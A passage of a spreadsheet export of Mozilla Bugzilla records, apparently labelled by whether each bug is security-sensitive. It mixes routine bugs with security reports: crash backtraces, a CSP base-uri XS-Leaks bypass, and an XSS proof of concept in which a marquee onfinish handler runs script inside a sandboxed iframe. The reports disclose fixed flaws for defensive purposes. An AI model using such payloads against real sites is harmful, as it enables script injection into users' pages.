#60 0x0854b440 in JS_CallFunction (cx=0xf7a74020, obj=..., fun=fun@entry=..., args=..., rval=rval@entry=...) at js/src/jsapi.cpp:2883
#61 0x088487bc in OOMTest (cx=cx@entry=0xf7a74020, argc=argc@entry=1, vp=vp@entry=0xf59ffdd8) at js/src/builtin/TestingFunctions.cpp:1310
#62 0x084fafb3 in js::jit::Simulator::softwareInterrupt (this=0xf7a1c000, instr=0xf553b5d4) at js/src/jit/arm/Simulator-arm.cpp:2359
[...]
#92 main (argc=6, argv=0xffffcc84, envp=0xffffcca0) at js/src/shell/js.cpp:7483
eax	0x0	0
ebx	0x988cffc	159961084
ecx	0xf7e3a88c	-136075124
edx	0x0	0
esi	0xf54ec108	-179388152
edi	0xf54eb1e0	-179392032
ebp	0xffff6878	4294928504
esp	0xffff6810	4294928400
eip	0x84b74ca &lt;js::jit::CodeGeneratorARM::visitOutOfLineTableSwitch(js::jit::OutOfLineTableSwitch*)+970&gt;
=&gt; 0x84b74ca &lt;js::jit::CodeGeneratorARM::visitOutOfLineTableSwitch(js::jit::OutOfLineTableSwitch*)+970&gt;:	movl   $0x1b7,0x0
   0x84b74d4 &lt;js::jit::CodeGeneratorARM::visitOutOfLineTableSwitch(js::jit::OutOfLineTableSwitch*)+980&gt;:	call   0x8108050 &lt;abort()&gt;
The assertion indicates something being out of bounds which is likely a security problem. Marking s-s.</t>
        </is>
      </c>
      <c r="X2244" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2245">
      <c r="A2245" t="n">
        <v>1770094</v>
      </c>
      <c r="B2245" t="inlineStr">
        <is>
          <t>2022-05-18 20:38:00 -0700</t>
        </is>
      </c>
      <c r="C2245" t="inlineStr">
        <is>
          <t>XS-Leaks with CSP (base-uri) bypass by img tag.</t>
        </is>
      </c>
      <c r="D2245" t="inlineStr">
        <is>
          <t>2024-05-30 10:56:30 -0700</t>
        </is>
      </c>
      <c r="E2245" t="n">
        <v>1</v>
      </c>
      <c r="F2245" t="n">
        <v>1</v>
      </c>
      <c r="G2245" t="n">
        <v>3</v>
      </c>
      <c r="H2245" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2245" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2245" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2245" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2245" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2245" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2245" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2245" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2245" t="inlineStr">
        <is>
          <t>[domsecurity-backlog1] [adv-main105+][adv-esr102.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q2245" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2245" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2245" t="inlineStr">
        <is>
          <t>105 Branch</t>
        </is>
      </c>
      <c r="T2245" t="n">
        <v>1</v>
      </c>
      <c r="U2245" t="n">
        <v>0</v>
      </c>
      <c r="V2245" t="n">
        <v>36</v>
      </c>
      <c r="W2245" t="inlineStr">
        <is>
          <t>Created attachment 9277231
Information leaks to attack.example.com
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Steps to reproduce:
I have a Content-Security-Policy that restricts reading of the base tag to 'self'.
And checked if this restriction is effective by injecting HTML tags.
Actual results:
CSP appeared to have successfully prevented base tag injection.
However, from the img tag, it was confirmed that the request was sent to the URI specified in the base.
Only FireFox could get the secret path of a user's img tag by XS-Leaks.
The attached poc.html confirms the leakage of confidential information (uuid).
I am assuming an attack scenario where the profile URL is secret and the tag injection occurs on the top page.
Expected results:
A base tag blocked by CSP is invalid, and the img tag should issue a request to the original URI.</t>
        </is>
      </c>
      <c r="X2245" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2246">
      <c r="A2246" t="n">
        <v>732941</v>
      </c>
      <c r="B2246" t="inlineStr">
        <is>
          <t>2012-03-05 06:17:42 -0800</t>
        </is>
      </c>
      <c r="C2246" t="inlineStr">
        <is>
          <t>OOM Crash [@ nsCOMArray&lt;nsISelectionListener&gt;::operator[]] due to unhandled alloc failure in nsTypedSelection::NotifySelectionListeners</t>
        </is>
      </c>
      <c r="D2246" t="inlineStr">
        <is>
          <t>2012-05-18 13:26:44 -0700</t>
        </is>
      </c>
      <c r="E2246" t="n">
        <v>1</v>
      </c>
      <c r="F2246" t="n">
        <v>1</v>
      </c>
      <c r="G2246" t="n">
        <v>3</v>
      </c>
      <c r="H2246" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2246" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2246" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2246" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2246" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2246" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2246" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2246" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2246" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q2246" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2246" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2246" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T2246" t="n">
        <v>1</v>
      </c>
      <c r="U2246" t="n">
        <v>0</v>
      </c>
      <c r="V2246" t="n">
        <v>22</v>
      </c>
      <c r="W2246" t="inlineStr">
        <is>
          <t>Tested on m-c revision 8ea5c983743f: The code in nsTypedSelection::NotifySelectionListeners does not properly handle an OOM condition (I assume it's while cloning selectionListeners) that leads to the following assertion and crash:
###!!! ASSERTION: nsVoidArray::FastElementAt: index out of range: '0 &lt;= aIndex &amp;&amp; aIndex &lt; Count()', file ../../dist/include/nsVoidArray.h, line 78
Program received signal SIGSEGV, Segmentation fault.
nsCOMArray&lt;nsISelectionListener&gt;::operator[] (this=0x7fffffff8620, aIndex=0) at ../../dist/include/nsCOMArray.h:186
186             return ObjectAt(aIndex);
#0  nsCOMArray&lt;nsISelectionListener&gt;::operator[] (this=0x7fffffff8620, aIndex=0) at ../../dist/include/nsCOMArray.h:186
#1  0x00002aaaac7382ed in nsTypedSelection::NotifySelectionListeners (this=0x4e90470) at /srv/repos/browser/mozilla-central/layout/generic/nsSelection.cpp:5712
#2  0x00002aaaac738408 in nsTypedSelection::EndBatchChanges (this=&lt;optimized out&gt;) at /srv/repos/browser/mozilla-central/layout/generic/nsSelection.cpp:5734
#3  0x00002aaaacbb44e2 in nsEditor::DoTransaction (this=0x5c71bb0, aTxn=0x5c72210) at /srv/repos/browser/mozilla-central/editor/libeditor/base/nsEditor.cpp:716
#4  0x00002aaaacbacea0 in nsEditor::InsertNode (this=0x5c71bb0, aNode=0x5c72108, aParent=0x4e90668, aPosition=0) at /srv/repos/browser/mozilla-central/editor/libeditor/base/nsEditor.cpp:1404
#5  0x00002aaaacba81cd in CreateBogusNodeIfNeeded (aSelection=0x4e90470, this=0x5c71ee0) at /srv/repos/browser/mozilla-central/editor/libeditor/text/nsTextEditRules.cpp:1168
#6  nsTextEditRules::CreateBogusNodeIfNeeded (this=0x5c71ee0, aSelection=0x4e90470) at /srv/repos/browser/mozilla-central/editor/libeditor/text/nsTextEditRules.cpp:1115
#7  0x00002aaaacba97eb in Init (aEditor=&lt;optimized out&gt;, this=0x5c71ee0) at /srv/repos/browser/mozilla-central/editor/libeditor/text/nsTextEditRules.cpp:139
=&gt; 0x2aaaac736e73 &lt;nsCOMArray&lt;nsISelectionListener&gt;::operator[](int) const+73&gt;: mov    0x8(%rax,%rbx,8),%rax
rax            0x0      0
rbx            0x0      0
(gdb) f 1
#1  0x00002aaaac7382ed in nsTypedSelection::NotifySelectionListeners (this=0x4fef960) at /srv/repos/browser/mozilla-central/layout/generic/nsSelection.cpp:5712
5712        nsISelectionListener* thisListener = selectionListeners[i];
(gdb) p selectionListeners
$1 = {&lt;nsCOMArray_base&gt; = {mArray = {mImpl = 0x0}}, &lt;No data fields&gt;}
The backtrace of the failing allocation is as follows:
#0 /srv/repos/browser/mozilla-central/objdir-ff-gcc64dbg/dist/bin/libmozalloc.so(moz_malloc+0x5f)
#1 nsVoidArray::SizeTo(int) at objdir-ff-gcc64dbg/xpcom/build/nsVoidArray.cpp:231
#2 nsVoidArray::Count() const at xpcom/glue/nsVoidArray.h:67
#3 nsCOMPtr&lt;nsIPresShell&gt;::begin_assignment() at objdir-ff-gcc64dbg/dist/include/nsCOMPtr.h:1241 
#4 nsTypedSelection::EndBatchChanges() at layout/generic/nsSelection.cpp:5737
#5 nsEditor::DoTransaction(nsITransaction*) at editor/libeditor/base/nsEditor.cpp:702
#6 nsEditor::InsertNode(nsIDOMNode*, nsIDOMNode*, int) at editor/libeditor/base/nsEditor.cpp:1404
#7 nsTextEditRules::CreateBogusNodeIfNeeded(nsISelection*) at editor/libeditor/text/nsTextEditRules.cpp:1169
#8 nsTextEditRules::Init(nsPlaintextEditor*) at editor/libeditor/text/nsTextEditRules.cpp:140
#9 nsPlaintextEditor::EndEditorInit() at editor/libeditor/text/nsPlaintextEditor.cpp:221
#10 ~nsAutoEditInitRulesTrigger at editor/libeditor/text/nsTextEditUtils.cpp:123
#11 nsPlaintextEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int) at editor/libeditor/text/nsPlaintextEditor.cpp:159
#12 nsTextEditorState::PrepareEditor(nsAString_internal const*) at content/html/content/src/nsTextEditorState.cpp:1225
#13 nsTextEditorState::GetEditor() at content/html/content/src/nsTextEditorState.cpp:1010
#14 ns_if_addref&lt;nsIEditor*&gt; at objdir-ff-gcc64dbg/dist/include/nsISupportsUtils.h:93
#15 /srv/repos/browser/mozilla-central/objdir-ff-gcc64dbg/dist/bin/libxul.so(NS_InvokeByIndex_P+0x23a)
I'm marking this as s-s for now because it's not clear to me what mSelectionListeners contains exactly, especially if the attacker can control how many listeners are in there (which could turn the crash into a controlled read). However, even in that case, exploitation is likely very hard because creating a controlled OOM in that location is surely not trivial.</t>
        </is>
      </c>
      <c r="X2246" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2247">
      <c r="A2247" t="n">
        <v>1153138</v>
      </c>
      <c r="B2247" t="inlineStr">
        <is>
          <t>2015-04-10 01:40:42 -0700</t>
        </is>
      </c>
      <c r="C2247" t="inlineStr">
        <is>
          <t>Simplify regex for desktop l10n repack nightlies now their buildernames are more consistent</t>
        </is>
      </c>
      <c r="D2247" t="inlineStr">
        <is>
          <t>2015-04-13 08:56:33 -0700</t>
        </is>
      </c>
      <c r="E2247" t="n">
        <v>1</v>
      </c>
      <c r="F2247" t="n">
        <v>1</v>
      </c>
      <c r="G2247" t="n">
        <v>7</v>
      </c>
      <c r="H2247" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2247" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2247" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K2247" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2247" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2247" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2247" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2247" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2247" t="inlineStr"/>
      <c r="Q2247" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2247" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2247" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2247" t="n">
        <v>1</v>
      </c>
      <c r="U2247" t="n">
        <v>0</v>
      </c>
      <c r="V2247" t="n">
        <v>4</v>
      </c>
      <c r="W2247" t="inlineStr">
        <is>
          <t>Now that the buildernames have been made more consistent by bug 740142, we can simplify our regex again :-)
https://hg.mozilla.org/build/buildbotcustom/rev/2ad242b35b83
Before:
Firefox mozilla-central linux nightly l10n N/3
Firefox mozilla-central linux64 nightly l10n N/3
Firefox mozilla-central macosx64 nightly l10n N/3
Firefox mozilla-central win32 nightly l10n N/3
Firefox mozilla-central win64 nightly l10n N/3
After:
Firefox mozilla-central linux l10n nightly-N
Firefox mozilla-central linux64 l10n nightly-N
Firefox mozilla-central macosx64 l10n nightly-N
Firefox mozilla-central win32 l10n nightly-N
Firefox mozilla-central win64 l10n nightly-N</t>
        </is>
      </c>
      <c r="X2247" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2248">
      <c r="A2248" t="n">
        <v>97721</v>
      </c>
      <c r="B2248" t="inlineStr">
        <is>
          <t>2001-08-30 22:22:39 -0700</t>
        </is>
      </c>
      <c r="C2248" t="inlineStr">
        <is>
          <t>New min. version for perl [5.005]</t>
        </is>
      </c>
      <c r="D2248" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E2248" t="n">
        <v>1</v>
      </c>
      <c r="F2248" t="n">
        <v>1</v>
      </c>
      <c r="G2248" t="n">
        <v>4</v>
      </c>
      <c r="H2248" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2248" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2248" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K2248" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L2248" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2248" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2248" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2248" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2248" t="inlineStr"/>
      <c r="Q2248" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2248" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2248" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T2248" t="n">
        <v>1</v>
      </c>
      <c r="U2248" t="n">
        <v>0</v>
      </c>
      <c r="V2248" t="n">
        <v>10</v>
      </c>
      <c r="W2248" t="inlineStr">
        <is>
          <t>The attachment tracker that just went in uses the Template Toolkit, which only
works on Perl 5.005 and newer.  Because of this usage and other planned useage
of the Template Toolkit in Bugzilla, our new minimum version will have to be 5.005.</t>
        </is>
      </c>
      <c r="X2248" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2249">
      <c r="A2249" t="n">
        <v>343756</v>
      </c>
      <c r="B2249" t="inlineStr">
        <is>
          <t>2006-07-06 08:46:19 -0700</t>
        </is>
      </c>
      <c r="C2249" t="inlineStr">
        <is>
          <t>Request to add SwissSign root CA certificate</t>
        </is>
      </c>
      <c r="D2249" t="inlineStr">
        <is>
          <t>2022-11-14 14:23:30 -0800</t>
        </is>
      </c>
      <c r="E2249" t="n">
        <v>1</v>
      </c>
      <c r="F2249" t="n">
        <v>1</v>
      </c>
      <c r="G2249" t="n">
        <v>5</v>
      </c>
      <c r="H2249" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2249" t="inlineStr">
        <is>
          <t>CA Program</t>
        </is>
      </c>
      <c r="J2249" t="inlineStr">
        <is>
          <t>CA Certificate Root Program</t>
        </is>
      </c>
      <c r="K2249" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2249" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2249" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2249" t="inlineStr"/>
      <c r="Q2249" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2249" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2249" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2249" t="n">
        <v>1</v>
      </c>
      <c r="U2249" t="n">
        <v>0</v>
      </c>
      <c r="V2249" t="n">
        <v>67</v>
      </c>
      <c r="W2249" t="inlineStr">
        <is>
          <t>SwissSign is another public CA based in Switzerland. For more information about SwissSign please see the CA certificate list web page at the URL above. I'll add more information here as I read through the SwissSign CPS documents.</t>
        </is>
      </c>
      <c r="X2249" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2250">
      <c r="A2250" t="n">
        <v>519450</v>
      </c>
      <c r="B2250" t="inlineStr">
        <is>
          <t>2009-09-29 08:26:11 -0700</t>
        </is>
      </c>
      <c r="C2250" t="inlineStr">
        <is>
          <t>Collections Extension: Thunderbird 2 Per-platform Stylesheets</t>
        </is>
      </c>
      <c r="D2250" t="inlineStr">
        <is>
          <t>2016-02-04 14:48:39 -0800</t>
        </is>
      </c>
      <c r="E2250" t="n">
        <v>1</v>
      </c>
      <c r="F2250" t="n">
        <v>1</v>
      </c>
      <c r="G2250" t="n">
        <v>6</v>
      </c>
      <c r="H2250" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2250" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J2250" t="inlineStr">
        <is>
          <t>Collector Extension</t>
        </is>
      </c>
      <c r="K2250" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2250" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2250" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2250" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2250" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2250" t="inlineStr"/>
      <c r="Q2250" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2250" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2250" t="inlineStr">
        <is>
          <t>BW-1.1</t>
        </is>
      </c>
      <c r="T2250" t="n">
        <v>1</v>
      </c>
      <c r="U2250" t="n">
        <v>0</v>
      </c>
      <c r="V2250" t="n">
        <v>3</v>
      </c>
      <c r="W2250" t="inlineStr">
        <is>
          <t>Mozilla 1.8 (TB2) does not support 'override' in chrome.manifest in TB2. So I put versions of the stylesheets we override directly in skin/ for now so that TB2 picks them up. These means there are no platform specific versions for now.
The current ones are Mac based, meaning the toolbar icon is too large on Windows and Linux.</t>
        </is>
      </c>
      <c r="X2250" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2251">
      <c r="A2251" t="n">
        <v>1277475</v>
      </c>
      <c r="B2251" t="inlineStr">
        <is>
          <t>2016-06-02 00:56:35 -0700</t>
        </is>
      </c>
      <c r="C2251" t="inlineStr">
        <is>
          <t>XSS out of iframe sandbox, iframe disabled javascript. marquee</t>
        </is>
      </c>
      <c r="D2251" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:53 -0700</t>
        </is>
      </c>
      <c r="E2251" t="n">
        <v>1</v>
      </c>
      <c r="F2251" t="n">
        <v>1</v>
      </c>
      <c r="G2251" t="n">
        <v>3</v>
      </c>
      <c r="H2251" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2251" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2251" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2251" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L2251" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2251" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2251" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2251" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2251" t="inlineStr">
        <is>
          <t>[domsecurity-active][adv-main48+]</t>
        </is>
      </c>
      <c r="Q2251" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2251" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2251" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T2251" t="n">
        <v>1</v>
      </c>
      <c r="U2251" t="n">
        <v>0</v>
      </c>
      <c r="V2251" t="n">
        <v>32</v>
      </c>
      <c r="W2251" t="inlineStr">
        <is>
          <t>Created attachment 8759064
security bug.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Steps to reproduce:
1) create first file index.html with
&lt;html&gt;
&lt;head&gt;&lt;/head&gt;
&lt;body&gt;
&lt;marquee loop=1 width=0 onfinish=alert(1)&gt;
&lt;/body&gt;
&lt;/html&gt;
2) create second file iframe.html with
&lt;html&gt;
&lt;body&gt;
	&lt;iframe frameborder="0" sandbox="allow-same-origin" src="./index.html"&gt;
	&lt;/iframe&gt;
&lt;/body&gt;
&lt;/html&gt;
3) Open iframe.html at firefox last version 46.0.1
Actual results:
XSS. javascript executed.
At chrome and safari problem not occur.
Expected results:
XSS should not be executed
I think this issue is part of bug bounty program https://www.mozilla.org/en-US/security/client-bug-bounty/</t>
        </is>
      </c>
      <c r="X2251" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2252">
      <c r="A2252" t="n">
        <v>969549</v>
      </c>
      <c r="B2252" t="inlineStr">
        <is>
          <t>2014-02-07 11:54:32 -0800</t>
        </is>
      </c>
      <c r="C2252" t="inlineStr">
        <is>
          <t>Faulty: PCompositableTransaction reinterprets between layer types based on untrusted message params</t>
        </is>
      </c>
      <c r="D2252" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:34 -0700</t>
        </is>
      </c>
      <c r="E2252" t="n">
        <v>1</v>
      </c>
      <c r="F2252" t="n">
        <v>1</v>
      </c>
      <c r="G2252" t="n">
        <v>3</v>
      </c>
      <c r="H2252" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2252" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2252" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K2252" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2252" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2252" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2252" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2252" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2252" t="inlineStr">
        <is>
          <t>[adv-main30+][qa-]</t>
        </is>
      </c>
      <c r="Q2252" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2252" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2252" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T2252" t="n">
        <v>1</v>
      </c>
      <c r="U2252" t="n">
        <v>0</v>
      </c>
      <c r="V2252" t="n">
        <v>15</v>
      </c>
      <c r="W2252" t="inlineStr">
        <is>
          <t>Created attachment 8372485
Faulty session
Found by Christoph Diehl's "Faulty" fuzzer, see bug 777067
This is similar to bug 968833, but now for the PCompositableTransaction protocol.</t>
        </is>
      </c>
      <c r="X2252" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2253">
      <c r="A2253" t="n">
        <v>717063</v>
      </c>
      <c r="B2253" t="inlineStr">
        <is>
          <t>2012-01-10 15:14:03 -0800</t>
        </is>
      </c>
      <c r="C2253" t="inlineStr">
        <is>
          <t>Mobile template still includes document_vote.html</t>
        </is>
      </c>
      <c r="D2253" t="inlineStr">
        <is>
          <t>2012-01-10 17:05:30 -0800</t>
        </is>
      </c>
      <c r="E2253" t="n">
        <v>1</v>
      </c>
      <c r="F2253" t="n">
        <v>1</v>
      </c>
      <c r="G2253" t="n">
        <v>5</v>
      </c>
      <c r="H2253" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2253" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2253" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2253" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2253" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2253" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2253" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2253" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2253" t="inlineStr">
        <is>
          <t>u=user c=wiki s=2012.1 p=1 post-sprint</t>
        </is>
      </c>
      <c r="Q2253" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2253" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2253" t="inlineStr">
        <is>
          <t>2012-01-10</t>
        </is>
      </c>
      <c r="T2253" t="n">
        <v>1</v>
      </c>
      <c r="U2253" t="n">
        <v>0</v>
      </c>
      <c r="V2253" t="n">
        <v>3</v>
      </c>
      <c r="W2253" t="inlineStr">
        <is>
          <t>The voting was refactored into macro and I missed the mobile template</t>
        </is>
      </c>
      <c r="X2253" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2254">
      <c r="A2254" t="n">
        <v>662749</v>
      </c>
      <c r="B2254" t="inlineStr">
        <is>
          <t>2011-06-08 00:38:25 -0700</t>
        </is>
      </c>
      <c r="C2254" t="inlineStr">
        <is>
          <t>Notify of l10n readiness, not approval</t>
        </is>
      </c>
      <c r="D2254" t="inlineStr">
        <is>
          <t>2011-07-19 08:43:18 -0700</t>
        </is>
      </c>
      <c r="E2254" t="n">
        <v>1</v>
      </c>
      <c r="F2254" t="n">
        <v>1</v>
      </c>
      <c r="G2254" t="n">
        <v>5</v>
      </c>
      <c r="H2254" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2254" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2254" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2254" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2254" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2254" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2254" t="inlineStr"/>
      <c r="Q2254" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2254" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2254" t="inlineStr">
        <is>
          <t>2011-07-19</t>
        </is>
      </c>
      <c r="T2254" t="n">
        <v>1</v>
      </c>
      <c r="U2254" t="n">
        <v>0</v>
      </c>
      <c r="V2254" t="n">
        <v>4</v>
      </c>
      <c r="W2254" t="inlineStr">
        <is>
          <t>Currently, the l10n dash of a language provides an option to subscribe to notifications of approvals in that language. We should remove this and replace it with one that notifies of ready-for-l10n (that is, Revision.is_ready_for_localization=True) approvals in the language. The old ApproveRevisionInLocaleEvent is still necessary, so don't remove it altogether.
(We don't need to retain an ApproveRevisionInLocaleEvent unsubscribe link on the l10n dash, because the &lt;32 people who have that type of subscription can unsubscribe using the link in the emails.)</t>
        </is>
      </c>
      <c r="X2254" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2255">
      <c r="A2255" t="n">
        <v>1625404</v>
      </c>
      <c r="B2255" t="inlineStr">
        <is>
          <t>2020-03-27 01:36:42 -0700</t>
        </is>
      </c>
      <c r="C2255" t="inlineStr">
        <is>
          <t>CopyTexSubImage leaves unwritten destination pixels as uninitialized data instead of lazy-initializing</t>
        </is>
      </c>
      <c r="D2255" t="inlineStr">
        <is>
          <t>2020-06-05 00:40:43 -0700</t>
        </is>
      </c>
      <c r="E2255" t="n">
        <v>1</v>
      </c>
      <c r="F2255" t="n">
        <v>1</v>
      </c>
      <c r="G2255" t="n">
        <v>3</v>
      </c>
      <c r="H2255" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
